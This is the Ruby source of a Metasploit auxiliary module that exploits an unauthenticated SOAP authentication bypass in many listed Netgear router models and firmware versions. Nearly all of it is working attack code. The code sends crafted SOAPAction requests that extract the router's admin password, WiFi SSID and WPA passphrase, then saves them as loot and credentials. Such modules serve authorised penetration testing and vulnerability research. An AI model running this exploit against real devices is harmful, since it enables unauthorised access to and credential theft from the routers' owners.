Netgear Unauthenticated SOAP Password Extractor

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  def initialize    super(      'Name' => 'Netgear Unauthenticated SOAP Password Extractor',      'Description' => %q{        This module exploits an authentication bypass vulnerability in different Netgear devices.        It allows to extract the password for the remote management interface. This module has been        tested on a Netgear WNDR3700v4 - V1.0.1.42, but other devices are reported as vulnerable:        NetGear WNDR3700v4 - V1.0.0.4SH, NetGear WNDR3700v4 - V1.0.1.52, NetGear WNR2200 - V1.0.1.88,        NetGear WNR2500 - V1.0.0.24, NetGear WNDR3700v2 - V1.0.1.14 (Tested by Paula Thomas),        NetGear WNDR3700v1 - V1.0.16.98 (Tested by Michal Bartoszkiewicz),        NetGear WNDR3700v1 - V1.0.7.98 (Tested by Michal Bartoszkiewicz),        NetGear WNDR4300 - V1.0.1.60 (Tested by Ronny Lindner),        NetGear R6300v2 - V1.0.3.8 (Tested by Robert Mueller),        NetGear WNDR3300 - V1.0.45 (Tested by Robert Mueller),        NetGear WNDR3800 - V1.0.0.48 (Tested by an Anonymous contributor),        NetGear WNR1000v2 - V1.0.1.1 (Tested by Jimi Sebree),        NetGear WNR1000v2 - V1.1.2.58 (Tested by Chris Boulton),        NetGear WNR2000v3 - v1.1.2.10 (Tested by h00die)      },      'References' => [        [ 'BID', '72640' ],        [ 'OSVDB', '118316' ],        [ 'URL', 'https://github.com/darkarnium/secpub/tree/master/Vulnerabilities/NetGear/SOAPWNDR' ]      ],      'Author' => [        'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery        'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module        'h00die <[email protected]>' # Metasploit enhancements/docs      ],      'License' => MSF_LICENSE,      'DisclosureDate' => 'Feb 11 2015'    )  end  def run    print_status('Trying to access the configuration of the device')    # extract device details    action = 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo'    print_status('Extracting Firmware version...')    extract_data(action)    # extract credentials    action = 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo'    print_status('Extracting credentials...')    extract_data(action)    # extract wifi info    action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetInfo'    print_status('Extracting Wifi...')    extract_data(action)    # extract WPA info    action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetWPASecurityKeys'    print_status('Extracting WPA Keys...')    extract_data(action)  end  def extract_data(soap_action)    res = send_request_cgi({      'method' => 'POST',      'uri' => '/',      'headers' => {        'SOAPAction' => soap_action      },      'data' => '='    })    return if res.nil?    return if res.code == 404    return if res.headers['Server'].nil?    # unknown if other devices have other Server headers    return if res.headers['Server'] !~ %r{Linux/2.6.15 uhttpd/1.0.0 soap/1.0}    if res.body =~ %r{<NewPassword>(.*)</NewPassword>}      print_status('Credentials found, extracting...')      extract_credentials(res.body)    end    if res.body =~ %r{<ModelName>(.*)</ModelName>}      model_name = ::Regexp.last_match(1)      print_good("Model #{model_name} found")    end    if res.body =~ %r{<Firmwareversion>(.*)</Firmwareversion>}      firmware_version = ::Regexp.last_match(1)      print_good("Firmware version #{firmware_version} found")      # store all details as loot      loot = store_loot('netgear_soap_device.config', 'text/plain', rhost, res.body)      print_good("Device details downloaded to: #{loot}")    end    if res.body =~ %r{<NewSSID>(.*)</NewSSID>}      ssid = ::Regexp.last_match(1)      print_good("Wifi SSID: #{ssid}")    end    if res.body =~ %r{<NewBasicEncryptionModes>(.*)</NewBasicEncryptionModes>}      wifi_encryption = ::Regexp.last_match(1)      print_good("Wifi Encryption: #{wifi_encryption}")    end    if res.body =~ %r{<NewWPAPassphrase>(.*)</NewWPAPassphrase>}      wifi_password = ::Regexp.last_match(1)      print_good("Wifi Password: #{wifi_password}")    end  rescue ::Rex::ConnectionError    vprint_error('Failed to connect to the web server')    return  end  def extract_credentials(body)    body.each_line do |line|      next unless line =~ %r{<NewPassword>(.*)</NewPassword>}      pass = ::Regexp.last_match(1)      print_good("admin / #{pass} credentials found")      connection_details = {        module_fullname: fullname,        private_data: pass,        private_type: :password,        username: 'admin',        status: Metasploit::Model::Login::Status::UNTRIED      }.merge(service_details)      create_credential_and_login(connection_details)    end    # store all details as loot    loot = store_loot('netgear_soap_account.config', 'text/plain', rhost, body)    print_good("Account details downloaded to: #{loot}")  endend